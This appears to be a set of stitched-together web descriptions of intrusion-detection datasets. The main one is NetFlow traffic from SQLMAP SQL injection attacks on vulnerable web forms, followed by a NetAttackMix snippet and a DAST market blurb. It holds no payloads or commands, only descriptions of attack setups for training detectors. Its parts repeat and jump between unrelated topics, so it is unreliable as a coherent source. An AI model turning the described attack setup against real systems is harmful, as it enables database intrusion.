Introduction

This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.

NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).

The datasets contain both benign and malicious traffic. All collected datasets are balanced.

The version of NetFlow used to build the datasets is 5.

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).

The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.

The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.

Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

To run the MySQL server we ran MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

This dataset has SQL injection attacks as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLmap tool has been used.

NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

The version of NetFlow used to build the datasets is 5.

NetAttackMix

The NetAttackMix dataset combines normal network traffic with three classes of injection attacks for training and evaluating detection models:

  Class Description

SQL Injection (SQLi) – attempts to manipulate SQL statements through request parameters.
Cross-Site Scripting (XSS) – injection of client-side scripts that execute in the victim’s browser.
Command / OS Injection (CMDi) – payloads that try to run shell commands on the server, often leading to… See the full description on the dataset page: https://huggingface.co/datasets/blnkoff/NetAttackMix.

Labels of normal and attack classes in the CICIDS-2017 dataset.

Dynamic Application Security Testing Market was valued at USD 2687.63 Million in 2023 and is projected to reach USD 39.86 Billion by 2031, growing at a CAGR of 24.71% from 2024 to 2031.

Dynamic Application Security Testing Market: Definition/ Overview

Dynamic Application Security Testing (DAST) serves as a digital security guard for your online apps. It uses real-world attacker strategies to find flaws in your application's security. Imagine someone attempting to break into your home; DAST performs the same for your program but virtually. DAST tools interact with your running application to analyze its behavior and responses to various inputs. They often look for popular vulnerabilities such as SQL injection (injecting malicious code into database queries) and cross-site scripting (injecting scripts to steal user data). DAST assists in identifying weaknesses before they are exploited by real hackers.

Dynamic Application Security Testing (DAST) serves as a digital watchdog over your online apps and APIs. It replicates real-world attacks demonstrating how hackers could exploit flaws. DAST identifies vulnerabilities in operating applications that static code analysis techniques may overlook. These can include standard security issues such as SQL injection (database manipulation) and cross-site scripting (malicious code injection).

Artificial intelligence (AI) will play a larger role in DAST improving accuracy and efficiency. AI may learn from previous weaknesses and attack patterns making it better at recognizing new threats. Additionally, AI can automate processes such as selecting vulnerabilities based on severity allowing security professionals to focus on complicated issues. As APIs become the foundation of modern systems, DAST will evolve to uncover vulnerabilities particular to APIs. This is vital since a hacked API can reveal sensitive information or interrupt critical functions.